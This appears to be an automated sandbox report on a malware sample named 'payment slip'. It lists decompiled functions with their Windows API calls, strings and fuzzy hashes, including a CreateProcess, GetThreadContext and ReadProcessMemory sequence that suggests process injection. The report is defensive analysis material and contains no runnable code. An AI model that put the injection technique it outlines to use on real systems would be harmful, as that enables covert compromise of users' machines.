                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1389714096.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3b00000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                        • String ID:
                                        • API String ID: 2438371351-0
                                        • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                        • Instruction ID: fd983c4951f46637f359ca176249b6c396061e72968d94f371d47ba0d3c5b766
                                        • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                        • Instruction Fuzzy Hash: 5E620934A14258DBEB24CFA4C850BDEB776EF58304F1091A9D10DEB2D0E77A9E81CB59
                                        Function 00033923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000733A2
                                          • Part of subcall function 00036B57: _wcslen.LIBCMT ref: 00036B6A
                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00033A04
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: IconLoadNotifyShell_String_wcslen
                                        • String ID: Line:
                                        • API String ID: 2289894680-1585850449
                                        • Opcode ID: a7dae8cd78000b19e064dcb2c3137efdd0350ed7e3bca1e2e1bc03814cbb06bd
                                        • Instruction ID: 9ef8acbd347189736d6710782c6bfb898bf6c7fb6d57c21a4cd4c96068b0faf3
                                        • Opcode Fuzzy Hash: a7dae8cd78000b19e064dcb2c3137efdd0350ed7e3bca1e2e1bc03814cbb06bd
                                        • Instruction Fuzzy Hash: 0531C271408304AAD326EB20DC85BEFB7DCAB45720F00892EF5D996092DBB49788C7D2
                                        Function 0004FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00050668
                                          • Part of subcall function 000532A4: RaiseException.KERNEL32(?,?,?,0005068A,?,00101444,?,?,?,?,?,?,0005068A,00031129,000F8738,00031129), ref: 00053304
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00050685
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Exception@8Throw$ExceptionRaise
                                        • String ID: Unknown exception
                                        • API String ID: 3476068407-410509341
                                        • Opcode ID: b4409ccc2c68503764fe6ded738dd13c56cc48f85e12c104f6e2ab8cbf341d24
                                        • Instruction ID: 490397f070c6710fc93f0b5b62357c669dbb14332d447795f247fca2d340b7df
                                        • Opcode Fuzzy Hash: b4409ccc2c68503764fe6ded738dd13c56cc48f85e12c104f6e2ab8cbf341d24
                                        • Instruction Fuzzy Hash: A9F0C23490070EB7CB00BAA4D84ADEF77AD5F00351B604531BD14DA992EF71EA6DC695
                                        Function 000A3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 000A302F
                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 000A3044
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Temp$FileNamePath
                                        • String ID: aut
                                        • API String ID: 3285503233-3010740371
                                        • Opcode ID: 56e32bf441613fda17dcff451ee009647aefdc4eb858da15f85b1dbee1073fe8
                                        • Instruction ID: bd32a276fbfac23f5fb68cde1c9268479b263714edd4c0c7418d7144954ac114
                                        • Opcode Fuzzy Hash: 56e32bf441613fda17dcff451ee009647aefdc4eb858da15f85b1dbee1073fe8
                                        • Instruction Fuzzy Hash: 66D05E7250032867EA20E7A4EC0EFDB3A6CDB04750F0002A1B759E6091DAB49984CAD0
                                        Function 000B7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 000B82F5
                                        • TerminateProcess.KERNEL32(00000000), ref: 000B82FC
                                        • FreeLibrary.KERNEL32(?,?,?,?), ref: 000B84DD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$CurrentFreeLibraryTerminate
                                        • String ID:
                                        • API String ID: 146820519-0
                                        • Opcode ID: c87b7a24d34beaec7f41aa68025ed28e58644fb88c0d484b558e1a7676e1aac3
                                        • Instruction ID: 7251716b715d9ac36e0e1feaee466f7da4e5e2c1d3c22304b37f8680f36e3c59
                                        • Opcode Fuzzy Hash: c87b7a24d34beaec7f41aa68025ed28e58644fb88c0d484b558e1a7676e1aac3
                                        • Instruction Fuzzy Hash: A5127B719083019FD764DF28C484BAABBE9FF85314F04895DE8899B262DB31ED45CF92
                                        Function 00065AA9 Relevance: 4.7, APIs: 3, Instructions: 186COMMONLIBRARYCODE
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: ed6764181b37f8330b651c646b47d149a4525680f60e09bdc629b2d338c057cc
                                        • Instruction ID: 8f43258db42514bc8276c811009b5805e8854e20bcb0e1f7df57f1fe38e4e142
                                        • Opcode Fuzzy Hash: ed6764181b37f8330b651c646b47d149a4525680f60e09bdc629b2d338c057cc
                                        • Instruction Fuzzy Hash: B951A171D0060AAFDB219FA8CC45FFE7BBAEF05322F140059F805A7292D7759A41DB61
                                        Function 000686AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,000685CC,?,000F8CC8,0000000C), ref: 00068704
                                        • GetLastError.KERNEL32(?,000685CC,?,000F8CC8,0000000C), ref: 0006870E
                                        • __dosmaperr.LIBCMT ref: 00068739
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                        • String ID:
                                        • API String ID: 490808831-0
                                        • Opcode ID: 86394155f83869678b2fb339686faa3d0cad942e444a383daf030c39befccc47
                                        • Instruction ID: e77c40e0a1a19a6aa65ad04b2b4db1b3f317515e4f1d2a3038c1e7443bb53d85
                                        • Opcode Fuzzy Hash: 86394155f83869678b2fb339686faa3d0cad942e444a383daf030c39befccc47
                                        • Instruction Fuzzy Hash: 23016B3260427026D2B06334EC45BBE27CB4B81B75F384319F9489B1D3DEA0CD818350
                                        Function 000A2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,000A2CD4,?,?,?,00000004,00000001), ref: 000A2FF2
                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,000A2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000A3006
                                        • CloseHandle.KERNEL32(00000000,?,000A2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 000A300D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: File$CloseCreateHandleTime
                                        • String ID:
                                        • API String ID: 3397143404-0
                                        • Opcode ID: a10514fb29b01f71bcadd819b879a9185663ae24a5ef6679edc9f6a2df36e68a
                                        • Instruction ID: 6f2d739df6fa0fadb8f166f5997aa7b4739e0a5109e35f980801238d74a2d562
                                        • Opcode Fuzzy Hash: a10514fb29b01f71bcadd819b879a9185663ae24a5ef6679edc9f6a2df36e68a
                                        • Instruction Fuzzy Hash: 87E0863268021077F2311756FC0DF8B3A5CD787B71F144214FB1D750D046A4160142A8
                                        Function 00041310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                        Download Yara Rule
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 000417F6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID: CALL
                                        • API String ID: 1385522511-4196123274
                                        • Opcode ID: 840aeae63458f27bf72d22b99e4ecaa14454d0e7e383d6d3b814267f06dbcd67
                                        • Instruction ID: 131d13fdc4c87afe9fefdfac8545a3c5f6b897048f6797496ca4810a25eefa46
                                        • Opcode Fuzzy Hash: 840aeae63458f27bf72d22b99e4ecaa14454d0e7e383d6d3b814267f06dbcd67
                                        • Instruction Fuzzy Hash: D7228CB0608201DFC764DF14C484BAABBF1BF85314F15892DF4968B3A2D772E985CB46
                                        Function 000A6EF1 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 297COMMON
                                        Download Yara Rule
                                        APIs
                                        • _wcslen.LIBCMT ref: 000A6F6B
                                          • Part of subcall function 00034ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EFD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: LibraryLoad_wcslen
                                        • String ID: >>>AUTOIT SCRIPT<<<
                                        • API String ID: 3312870042-2806939583
                                        • Opcode ID: ece208d4d4824ab23b224df376b9994e3a8c64bbdf4a981f796e4fff5d445cf7
                                        • Instruction ID: 868e4bb588b05c3dd03d9d171ff8a072aac3ab83841b5b671c2de064a459d44f
                                        • Opcode Fuzzy Hash: ece208d4d4824ab23b224df376b9994e3a8c64bbdf4a981f796e4fff5d445cf7
                                        • Instruction Fuzzy Hash: 24B1B2311082018FCB15EF60C891DAEB7E9AF95310F44892DF58A97263EF31ED49CB92
                                        Function 00032DE3 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetOpenFileNameW.COMDLG32(?), ref: 00072C8C
                                          • Part of subcall function 00033AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00033A97,?,?,00032E7F,?,?,?,00000000), ref: 00033AC2
                                          • Part of subcall function 00032DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00032DC4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Name$Path$FileFullLongOpen
                                        • String ID: X
                                        • API String ID: 779396738-3081909835
                                        • Opcode ID: 245b510518ebaad81e5112e0ee4cfde75c4c12f06a3c40652ec0bbaf3f61cdd1
                                        • Instruction ID: 05ab4bbd3d5b030ec6946f69fa90b3635db417b9cf5f481a41f8a97cc44a9713
                                        • Opcode Fuzzy Hash: 245b510518ebaad81e5112e0ee4cfde75c4c12f06a3c40652ec0bbaf3f61cdd1
                                        • Instruction Fuzzy Hash: 3521A871E0025C9FDB42EF94C845BEE7BFCAF49714F008059E505B7241DBB85A898FA1
                                        Function 000A2557 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: __fread_nolock
                                        • String ID: EA06
                                        • API String ID: 2638373210-3962188686
                                        • Opcode ID: 8a3b45d2641f885ff14e5a26595bc6a73a3a7f7e900662656626b15dc11d7a11
                                        • Instruction ID: 86594eabe98b445d01c74357e0fdc6a686cb58d96e96fdc3bff9d10eb0bf2ad9
                                        • Opcode Fuzzy Hash: 8a3b45d2641f885ff14e5a26595bc6a73a3a7f7e900662656626b15dc11d7a11
                                        • Instruction Fuzzy Hash: 9D01B572D042587EDF28C7A8C856EFEBBF89B06301F00455AE592D6182E5B4E7088B60
                                        Function 00033837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00033908
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: IconNotifyShell_
                                        • String ID:
                                        • API String ID: 1144537725-0
                                        • Opcode ID: 5458a0d71d1c9973d0e936a4a502845f417b6a17f4ea3096227b9fbeb03b4c84
                                        • Instruction ID: b07283d3c423edfc6c6257780c463192faa4991bb9b3b0b77939080407e8d0fc
                                        • Opcode Fuzzy Hash: 5458a0d71d1c9973d0e936a4a502845f417b6a17f4ea3096227b9fbeb03b4c84
                                        • Instruction Fuzzy Hash: 3B319370904301DFE761DF24D884B9BBBE8FB49719F00092EF5DA87641E7B5AA44CB52
                                        Function 0003B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                        Download Yara Rule
                                        APIs
                                        • __Init_thread_footer.LIBCMT ref: 0003BB4E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Init_thread_footer
                                        • String ID:
                                        • API String ID: 1385522511-0
                                        • Opcode ID: 2c2f3716f00f1365efd27b16607665ec7b584c0c4b05b90b9eb7af620ff6c951
                                        • Instruction ID: 1ab05e007a4908f63834a4ab4a4743e44b945f5a79467c853724db3472ae997d
                                        • Opcode Fuzzy Hash: 2c2f3716f00f1365efd27b16607665ec7b584c0c4b05b90b9eb7af620ff6c951
                                        • Instruction Fuzzy Hash: 1932DF30A00209DFDB61DF54C898BBEB7F9FF44318F14805AEA85AB251C7B4AE45CB51
                                        Function 03B0129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 03B01ACD
                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03B01AF1
                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03B01B13
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1389714096.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03B00000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_3b00000_payment slip.jbxd
                                        Similarity
                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                        • String ID:
                                        • API String ID: 2438371351-0
                                        • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                        • Instruction ID: 8020b01372431f12794c138fd61f0e300eef5a5d27876e82cbfbb5d871e59178
                                        • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                        • Instruction Fuzzy Hash: 8612BD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81CF5A
                                        Function 00034ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00034E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E9C
                                          • Part of subcall function 00034E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00034EAE
                                          • Part of subcall function 00034E90: FreeLibrary.KERNEL32(00000000,?,?,00034EDD,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EC0
                                        • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034EFD
                                          • Part of subcall function 00034E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E62
                                          • Part of subcall function 00034E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00034E74
                                          • Part of subcall function 00034E59: FreeLibrary.KERNEL32(00000000,?,?,00073CDE,?,00101418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00034E87
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: Library$Load$AddressFreeProc
                                        • String ID:
                                        • API String ID: 2632591731-0
                                        • Opcode ID: 2d48f9fb74631b3a0678786e2ef9a6e40e60a6f84fe5bcf3bf193bc9774eb712
                                        • Instruction ID: 72bef9c433e68c672bc3e7a81239151b9055e0a5b278dc4dcac86c9fe5f09503
                                        • Opcode Fuzzy Hash: 2d48f9fb74631b3a0678786e2ef9a6e40e60a6f84fe5bcf3bf193bc9774eb712
                                        • Instruction Fuzzy Hash: 6211E336600205AEDB26AFA4DC02FED77A9AF40711F14842DF546AA1D2EE74AA059B50
                                        Function 00068402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_30000_payment slip.jbxd
                                        Similarity
                                        • API ID: __wsopen_s
                                        • String ID:
                                        • API String ID: 3347428461-0
                                        • Opcode ID: 2d5b583cd26cbbc38ac2efef70bcc690a0fb5fcf072c2d44329622e45b1cb301
                                        • Instruction ID: 0820ce8073b5f2ab3fd73f04513afe748f3e9fa2b1c0ae3a04001677ec502251
                                        • Opcode Fuzzy Hash: 2d5b583cd26cbbc38ac2efef70bcc690a0fb5fcf072c2d44329622e45b1cb301
                                        • Instruction Fuzzy Hash: E411487590410AAFCB05DF58E940ADE7BF9EF48300F108199F808AB312DA30DA11CBA4
                                        Function 00065000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00064C7D: RtlAllocateHeap.NTDLL(00000008,00031129,00000000,?,00062E29,00000001,00000364,?,?,?,0005F2DE,00063863,00101444,?,0004FDF5,?), ref: 00064CBE
                                        • _free.LIBCMT ref: 0006506C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1388559154.0000000000031000.00000020.00000001.01000000.00000003.sdmp, Offset: 00030000, based on PE: true
                                        • Associated: 00000000.00000002.1388488205.0000000000030000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388744260.00000000000F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388803902.00000000000FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1388824422.0000000000104000.00000002.00000001.01000000.00000003.sdmpDownload File
